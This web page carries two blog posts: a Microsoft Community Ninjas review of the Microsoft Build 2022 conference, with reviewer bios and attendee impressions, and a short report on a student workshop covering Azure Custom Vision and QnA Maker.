Covid-19 is still here! In the Third time the Microsoft Build conference runs virtually. Many people did not like, since they miss the in-person meeting. I, on the other hand, actually liked it a lot. Microsoft Build, like other Microsoft global events, are usually held in the USA. I am pretty sure that I could not travel to USA at this time and I know that many people have the same limitation – probably most of the global community. Having a virtual event has a lot of advantages. A virtual event increases accessibility both in terms of distance, for people who are on the other side of the world and also in terms of physical accessibility for people with disabilities. With that said, I understand the other side as well. Yes, it much better to meet in-person, but it is better to meet virtually than none. I am wondering how many prefer a virtual conference, on-premises, or maybe hybrid. What do you prefer, why?


 


The story behind this post


The original plan before the conference


A few days before the conference, I had an idea – let’s get some reviews from the community and publish it in the Microsoft Community Ninjas Blog. My original plan was to find some ninjas from the community who could provide an overview of the event from their point of view. I intended to collect the reviews and publish it in a single post a few days after the conference end. Originally the plan was to get 2 to 4 short paragraphs from each.


The first step was to create a registration form for those who want to review the event. Next published our Microsoft Build 2022 – Call for writers/reviewers in several social media networks including the Community Ninjas group on Facebook.


Ronen_Ariely_0-1654405148820.png


As always, the response was great and many members of the community responded to the call.


Out of the submitted responses we selected Six members for the task.


The next steps after the event


I probably did not explain the original plan well, or maybe we chose an amazing team with capabilities and experience I did not take into account. A day before the event I spoke with Carina Claesson, one of the reviewers. Carina sent me a number of links to posts she had previously published which included an overview of events. I immediately realized that what I was about to receive from Carina was much more than I had originally intended – She has written amazing reviews in the past and I started to realize that if I am going to get such a review here, then it is not something that can be assimilated in a single post but something that must stand on its own.


I asked the staff to provide the review no later than one week after the event end. One day more or less and I had all the reviews. It turnup that Carina was not the only one who provide such great work.


Something in my original plan was not best option.


I scheduled a meeting with all the team to come up with a better plan.


Ronen_Ariely_0-1654421942061.png


  


The reviewers team


Before I introduce all of our team members, I would like to take this opportunity to thank everyone who took part in this small project. We did not have much time from the moment the idea came up to the beginning of the event and the need to implement the task, and in less than a week we had to coordinate, divide tasks, and bring the best reviews there have been to the Microsoft BUILD conference. Here are the reviewers behind the project




































Rajkumar Jain



Cloud Solution architect, DevOps architect and community blogger.



[linkedin]



Mohamed El-Qassas & Heba Kamal



Mohamed El-Qassas is a Microsoft Most Valuable Professional (MVP), Microsoft Certified Trainer (MCT), SharePoint Stack Exchange (StackOverflow) Moderator, Microsoft QnA Moderator, C# Corner MVP, Microsoft TechNet Wiki Judge, Blogger, Speaker, and Technical Consultant with +13 years of experience in SharePoint, Project Server, Microsoft Teams, Microsoft 365, and Power Platform.



[linkedin]



Carina M. Claesson



Specialized in building solutions with Microsoft Power Platform and related technologies. 10+ years of experience from designing solutions built on Microsoft Dynamics CRM/xRM/365 CE. Passionate exploring the Power Platform. Regularly write reviews after Microsoft events on personal blog. Co-curator and run a weekly newsletter since October 2020. Created a Power Platform related wiki for the community. Enthusiastically explore new technology areas, gather, and share technical information. Strongly believe in sharing content and in a world where we all are uplifting, supportive and we grow together. Carina has been awarded as Microsoft Most Valuable Professional.



[linkedin]



Saeid Hasani



A senior database consultant with over 15 years of experience designing, developing and troubleshooting high-volume database solutions in mission-critical environments. Saeid is highly passionate about technology, helping others, and being part of the community; a leader at the Community Ninjas and co-founder of the Persian group, a blogger at Microsoft TechCommunity, and a TechNet Wiki council member. He has been a SQL Server forums moderator at MSDN and TechNet since 2013 and is serving as a Microsoft Q&A forums moderator.



[Linkedin]


[Facebook]


[Website]



Kamlesh Kumar



An Integration Architect, Technical Writer, member of the Microsoft TechNet Wiki council, moderator of the Community Ninjas blog at TechCommunity, and the moderator of the community group on Facebook. Kamlesh is active in the community and shares his knowledge in the integration area, also writes a personal technical blog on Azure Integration and Microsoft BizTalk. He has a YouTube channel where he shares the technical videos.



[linkedin]


[Facebook]


[Twitter]



Ronen Ariely



Senior consultant, an applications & data architect, with experience in variety programming languages and technologies, leading teams and enterprise level solutions. Ronen is active in communities (aka pituach) in the fields of Microsoft Azure, Data Platforms and .Net programming. He serves as Moderator at Microsoft forums, writes technical blogs and articles, he is co-admin of two Microsoft’s blogs, and has been awarded as Microsoft Most Valuable Professional.



[WebSite] [Blog][Facebook] [Linkedin]



 


What are we planning


next weeks?


Instead of reviewing the event in a single post, we decided that we had enough stories for an entire book, so we will publish a series of Build conference reviews. In the next coming days for a few weeks we will publish more posts in which we will present overview from speakers, attendees, Microsoft employees and community members.


This post will be the opening of the Microsoft Build community reviews.


I will present general insights from several members of the community including a short summarize from the reviewers team. 


next year?


This experience thought me a so much and we already spoke about huge plans for next year. The sky’s NOT the limit as we touch the Azure clouds every day :smile:


First of all, I would like to work together with the build event team, and run a similar project as we did this year with their support. I want to take it to the next level.


I am assuming that next year the event will be held in-person (physical) or as hybrid event. Therefore, like any big newspaper, I want to send reviewers to the field, participate physically in the event (on-premises) to do the task. The reviewers will be able to go around and interview the speakers, the organizers of the event and the attendees in person, take some pictures and bring back their and the community insights.


For the purpose of the assignment we prepared for each of our reviewers this year, a certificate which identifies him as an official reviewer of of the Microsoft Community Ninjas.


Ronen_Ariely_0-1654427304018.png


 


So… let’s go over the Microsoft build event from registration to closing as seen from my eyes, my thought, and my insights…


Registration and schedule


The interface is awesome! This is the same system which was used last year. We need such system for our local conferences like in sqlsaturday. It’s simple to use and powerful to manage.


BUT REMEMBER TO TURN DOWN YOUR SPEAKERS!


you have been warned :lol:


It’s a real party!


The music is loud and rhythmic. Lots of fun and lots of noise. I’m not sure anyone took into account that some of us are not in the US and we could be in the middle of the night. The music is turned on by default and you will be able to wake up not only your children but also the neighbors.


After a few hours of listening I started to go crazy from the background music that was running all the time in all the sessions while the lecturer was talking – very annoying. My recommendation is not to leave the main page open while you go to a session. My mistake was that I opened each session in separate tab in the browser.


Awesome tool!


Ronen_Ariely_0-1654414462067.png


I love to open my schedule on the right and select the session at the same time. Unfortunately the sessions on the right panel did not refreshed automatically when I picked another session. This can be improved (assuming the issue is not in the client side).


 


Tip! How to select the sessions: My solution was first to filter by category “DATA”, next “Power Platform” and next “Azure”. I selected as much sessions as I can filling my calendar. Finally, I filtered by speakers to make sure that I did not miss any important session. For example, I cannot miss any session with Bob Ward. He is simply too good.


A “HUGE” ISSUE!


problem! I did not find any option to configure my user at the event as an MVP . I search for a way to link my event account to my MVP account. I assume that the way to do it was to contact the MVP team. At first glance this seems irrelevant, but when I signed up for one of the Round Table sessions, my nomination was declined. This seems very strange to me in light of the fact that this was a discussion directly related to my MVP field. What’s more, I know the lecturer and we even schedule for him to speak in the User Group which I lead. He knows me by name, so it does not seem that the filtering goes through the speakers themselves. I contacted the speaker after the session and his words were “this is strange”. I agree. I missed a meeting where I could contribute to.


Sessions level & speakers


Round table sessions were too short. We had a great discussion and 30min was just not enough. The Round tables sessions are awesome!


I participate in all the sessions my schedule allowed me, moving from one session to the next. This event is a pure enjoyment. I am not sure id I learned anything new, but this is a result of the fact that I follow the updates in close channels. Anyone whom I spoke to described it as a  pure learning event.


Ronen_Ariely_0-1654430391111.pngRonen_Ariely_1-1654430517923.png


If I need to highlight two best sessions then this will be one of them: a Round Table with Rohit Nayak and Thomas Weiss:


Ronen_Ariely_2-1654430631237.png


The only problem was that all participates and the speakers wanted to continue and the time was too short.


And obviously the session of the SQL Server team will be in the top but really too short to learn anything. nice for announcements and for new users mostly.


Ronen_Ariely_3-1654430799653.png


Between the sessions


The only thing I was really missing during the whole event, is the interaction between the participants during the session and between the sessions. The use of chat is technologically efficient, but outdated. I expect virtual events of this magnitude to activate more attractive tools such as virtual reality. The interface of the event was very efficient and convenient and there were no issues. I remember last year there were many technical problems during the first day of the event and I even missed one session altogether since I could not connect to. This year I did not noticed or heard about any issue.


 


After event


It is highly recommend to watch the sessions which you missed and these you want to dive into. Continue your learning journey beyond the Microsoft Build. You can connect with experts and technical communities. Ask the Expert on topics that you loved at Microsoft Build, use the Microsoft forums for technical questions and the social media networks to interact and meet the experts. Join live meetups and user group’s meetings in your region and local language. Continue your learning now.


Microsoft New Documents


At the first day of the event, a significant amount of new documents were published to support all the new features, new products and new services which were announced at the Microsoft Build conference. If you participate in the Microsoft Build 2022 event or if you missed it, you still need to follow the new documentation of the products/service which you want to use. 


Check the (almost) full list of documents in this post!


 


A brief overview from speakers, attendees, Microsoft employees and community members


Sray Agarwal – Microsoft MVP and Build event speaker


I attended Microsoft Build 2022 in-person for the first time. I have been an audience to Build before but that was virtual. I was very keen on attending this one and jumped on the opportunity as soon as I got an invitation. Being an MVP, I always wanted to disseminate my experience to a larger community, and nothing can be bigger and better than Build. This build was special for two reason – first as it was a hybrid conference and second as I was a speaker on the topic, I am passionate about. I spoke on responsible and ethical AI and the most exciting part of my session was a room full of audience. Interestingly, the audience were just not listener but very interactive, I was glad about the kind of questions and perspective I got from my audience. The entire build session this year was designed that will allow people to attend and participate in the session from either comfort of their home or from the venue. What I like was the mix of speakers, almost all session was designed in a way that it was very informative and insightful for technical and non-technical experts. This time the audience comprised of people who are in university to people who are stalwarts in their field of expertise. The technical sessions were very insightful. They revealed newer ways of implementation, newer ways of integration and newer way of looking at things. I just wish that we had more time for audience interaction post our sessions.


Based out of London, Sray Agarwal is conversant in advanced Machine Learning with profound knowledge of algorithms and advanced statistic, Sray has joined us as a Principal Consultant in the Fractal AI. His contribution to the development of the technology was recognised by Microsoft when he won the Most Valued Professional in AI award in 2020 and 2021. He is also an expert for United Nations (UNCEFACT) and have recently authored a book on Responsible AI published by Springer


 


Rajkumar Jain, Cloud Solution architect and DevOps architect and community blogger.


Hello friends/readers,


AWESOME, AMAZING, WOW


I would like to start with these three words about Microsoft Build event.


Most awaited event for cloud community held by Microsoft CEO today. I am very excited to join and listen about new announcement, enhancement and upcoming future driven technology.


CEO shared multiple innovative ideas, use cases and how developer can optimize their efforts towards development. That’s why techno expert was waiting to unfold 2022 Microsoft box, excited to join and listen announcement to build future driven application and tools using cloud services.


Let me share summary of event


Session was divided into 10 innovative ideas of Azure growth that will cloud community to grow few of them are available and few of them will release soon.


CEO explain how Azure Developer flow help to grow and optimize the development in hybrid model.


Ronen_Ariely_0-1654432436879.png


Github used as SCM tool and enhanced feature can be used as DevOps/DevSecOps


CodeSpace – A tool use for developing cloud native application


Dev Box – Multi device support either it is IOS device, android device, Linux device or Windows device


Github Copilot – This is community tool where lots of community provider helping to groom Github project and have limited access to only community builder. Very soon it will be available for general availability.


Azure + 5G – Make a difference in society


Azure orbital – Help space agency to grow using Azure orbital service


Window 11 – Microsoft store


Windows 365 – Replace local pc with cloud pc in one click


Xbox Cloud Gaming – available in 26 countries


Cloud native app – All application develops on Microservices


Azure Container Apps – Build modern apps on open source, Focus on apps not on infrastructure


Azure Kubernetes Service (AKS) – Fully managed Kubernetes is the cloud , seamless DevOps


Azure Confidential Computing  – Data in use , Data in rest and Data in Transit                      


New Announcement – Microsoft store Ads, sharing 100% revenue, Azure cognitive services


 


Many more to come in future for Developer / Business community to grow and achieve goal at minimum cost , minimum time and optimized infra resource.


I hope you like my review , this year I attend virtually but may be next year we will meet in person as you know currently world is working in Hybrid mode :smiling_face_with_smiling_eyes:.


Stay Safe Stay Healthy.


Thanks


Rajkumar Jain


 


Mohamed El-Qassas & Heba Kamal, the first MVP couple in Middle East and Africa


As expected from the first MVP couple in Middle East and Africa, Mohamed and Heba decided to review the Microsoft Build conference together and wow, what a nice job they have done. They prepared a comprehensive overview of several pages with pictures and insights. We will publish their review in a separate post in a few days. 


When I asked then yo provide one sentence in a nutshell, they confirm that Microsoft Build 2022 was a well-organized and successful digital event as usual, and in this post, we have tried to cover most of the important updates and announcements that were shown in Microsoft Build by the CEO Satya Nadella, and it was a really helpful keynote that covered incredible and fantastic announcements and updates.


keep following the Microsoft Build series of reviews to read their review!


 


Kamlesh Kumar, Integration Architect, Technical Writer and co-leader in the Microsoft Community Ninjas


Overall, how the event was valuable to you and how was it valuable to the community


>> First of all I would like to thanks Microsoft and team to organize this build event. As expected we got to know the many new features and roadmap for many products that Microsoft has planned. This event was very much informative and to know the products upcoming features. If I talk about the community prospective then this build event was not only for Tech person though the non-tech person can also get a lot of new information and if they want to learn the technical stuff then from base they can start.


What do you think is the target audience for this event


>> Personally I feel, this event was for all, either you are techie person or non-technical person who want to learn.


How valuable (for you/for the community) was the content of the lectures you heard?


>> Content of lectures and session was very informative and I learned the many things with live demo given by team.


Do you think that the event provided an opportunity to connect with experts? How?


>> Yes, obesely. There was an option to connect with expert from all over the world in different different time zones. There was an option to connect with experts or product group in one-one conversion and get the expertise advice from them about the product or in their expertise area.


What do you think about the way the event was organized (connection, content, administrative, the web interface, and so on) and what could  be done better next year


>> Personally I feel it was very nice and well organized in all the area but still i was missing the old day where we can directly connect with experts in person and discuss the topics. I personally loved the connection zone and learn area in this build and I would love to see much more in future in these areas.


 


Carina M. Claesson, Microsoft Business Applications MVP


Do you remember how I stated this long (very very very long) post? Remember how my original plan changed once I got the reviews which Carina wrote?


Well… Carina wrote a full book, and not a short one. in the following days Carina is going to publish not one and not two reviews, but at least 5 separate posts, each better than the other. In the meantime, here are some insights from our top reviewer of the Microsoft Build conference 2022.


1. Overall, how the event was valuable to you and how was it valuable to the community
I like to keep myself updated around the roadmap for the technologies I’m working with, so that I can suggest good solutions for my customers. I work with Microsoft Business Applications and Power Platform is a part of this event. There are Release Waves and new features documented in Release Plans and there are Microsoft events, where big announcements are made, and the Release Plans might be updated. The event is valuable for the community because Build invites the community to participate and connect.
2. What do you think is the target audience for this event
There is already an answer to this question on the Build website, in the FAQ. There it says it is for developers, engineers, and IT professionals, students and career changers new to the tech industry. If you ask me, I would say traditionally it has been targeting professional developers, for the past years low code and collaboration features have been included too. Target audience today I would say professional developers working with Microsoft technologies, but also anyone who creates solutions with Microsoft Business Applications, anyone who utilizes and guides others within the collaboration features in Microsoft 365, and of course anyone who wants to start a career within the already mentioned areas.
3. How valuable (for you/for the community) was the content of the lectures you heard?
As already mentioned, Build often comes with big announcements. Within Microsoft Business Applications two such big announcements were Power Pages (Power Apps portals reimagined) and Express Design (making it possible to go from an image or Figma design to app). Besides of now knowing that we have more possibilities within the platform, at Build we could also see some demos using it in action.
4. Do you think that the event provided an opportunity to connect with experts? How?
Yes, by participating and engaging in the chat during the sessions and by connecting with others who also attended the event. For the lucky people who got to attend in-person at one of the regional spotlights, that meant even more opportunities.
5. What do you think about the way the event was organized (connection, content, administrative, the web interface, and so on) and what could be done better next year
Really good with the choice to participate virtually or at one of the regional spotlights. The digital venue had lots of different choices for languages, closed captioning and audio tracks, and sign language to be turned on or off. It was perfect with a digital backpack and being able to save sessions for up to 90 days. If I could wish for something more, it would be to have sessions available on-demand even faster and that it was possible to download the presentation decks from all sessions (I’ve seen it for some only). Overall, Build 2022 was a really great and inspiring event!


 


when one door closes another one opens


Wow, it’s time to close the day and prepare the next post in the Microsoft Build 2022 series – Community Ninjas review.


I hope you enjoyed reading and that the content was not too long. Did you cheat and scroll down to skip some sections? We invite you to add your review and feedback using the comments below


Thanks for joining us in the first review of the Microsoft Build conference 2022


 

Azure Cognitive Services Hands-on Workshop resources and insights.

Azure Cognitive Services Hands-on Workshop resources and insights.

This article is contributed. See the original author and article here.


Agenda


The agenda of the workshop was to provide students with a hands-on experience of Microsoft Azure Cognitive Services focusing mainly on Custom Vision and QnA Maker.


Also provided a brief introduction to Microsoft Azure and fundamentals of cloud computing concepts. Help them figure out how to exhibit Artificial Intelligence, Machine Learning, and Natural Language Processing (NLP) projects on their resume.


Overview


The workshop was attended by 30 students. All students received a Microsoft Azure for Student subscriptions.


azure_students.png


Starting with the basic concepts of cloud computing and how Azure Cognitive Services fits into the Microsoft Azure ecosystem. Elaborating on how API calls embed the ability to see, hear, speak, search, understand, and accelerate advanced decision-making into modern applications.


Quick revision of services under the Cognitive Services umbrella such as:



Flow of the workshop


After the introduction, the subscription were created by the students. Activating Azure for Student provided each of the students with a balance of $100 USD that they could use to explore and experiment with the services on the Azure portal.


All the activities performed were strictly directed by the Learning module on Microsoft Learn


Custom Vision



Note



Click the Custom Vision title to view the Microsoft Learn Document for this activity.

The first activity to be performed was on Custom Vision, where we discussed:




  • What is Custom Vision?




  • What are the applications of custom vision?




  • How to implement Custom Vision to your application?



    1. Creating a Custom Vision resource to get started

    2. Select the subscription, resource group, region, name, and pricing tier

    3. Upload the existing images of an object to train the model.

    4. Select the “Quick Training” option to quickly prepare the model in minutes

    5. Train an image classification model based on existing images

    6. Publish the model to use it in your applications




  • How to verify the functionalities of the trained model?


    To verify and test the model by running a simple command-line program in the Cloud Shell, real-world solutions, such as web sites or phone applications, use the same ideas and functionalities.




  • Troubleshooting the errors and blockades faced by the attendees throughout the workshop




After the Custom Vision session, there was short FAQ session to answer all the queries regarding custom vision.


QnA Maker



Note



Click the QnA Maker title to view the Microsoft Learn Document for this activity.

In the QnA Maker session, we aimed to create a live chat bot using python by:



  • Understanding what are Chat-bots

  • What are the applications for Chat-bots

  • Create a chat-bot

    1. Creating a QnA Maker resource to get started

    2. Select the subscription, resource group, region, name, and pricing tier

    3. Create a custom question answering knowledge base

    4. Edit the knowledge base

    5. Train and test the knowledge base

    6. Create a bot for the knowledge base

    7. Test the bot to verify its functionalities.




Conclusion


A questioning session was held where students can ask their queries about Microsoft services especially regrading Microsoft Azure and its services. A brief discussion about the Microsoft certifications and how students can leverage Microsoft Learn to excel in the certification exams.


Provision of a roadmap on what their approach should be if they want to make a career in Artificial Intelligence, Data Science, and Cloud Computing.


Take away from this session was to get a hands-on experience on Custom Vision and QnA Maker as service offerings from Microsoft Azure, and build real-time project on the same to showcase on their resume.